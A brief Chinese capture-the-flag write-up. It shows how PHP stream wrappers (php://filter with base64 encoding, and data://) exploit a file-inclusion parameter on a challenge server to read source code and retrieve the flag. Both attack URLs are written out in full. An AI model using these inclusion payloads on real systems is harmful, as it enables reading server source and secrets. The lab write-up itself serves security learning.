看网址,里面有一个wllm= 这个我们可以再根据下面的提示,利用PHP伪协议;
http://1.14.71.254:28685/index.PHP?wllm=PHP://filter/read=convert.base64-encode/resource=hint.PHP
将得到的数base64;
得到提示,让我们去访问/test2222222222222.PHP
就看到一堆的代码;a参数就是利用file_get_contents()函数只读形式打开,让它打开后内容要与"I want flag"字符串一样,才能继续执行下面的文件包含$file参数。再利用PHP伪协议中的data://协议。
http://1.14.71.254:28685/test2222222222222.PHP?a=data://text/plain;base64,SSB3YW50IGZsYWc=
拿到flag
这个主要是利用了PHP伪协议;
周五摸摸鱼~~
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。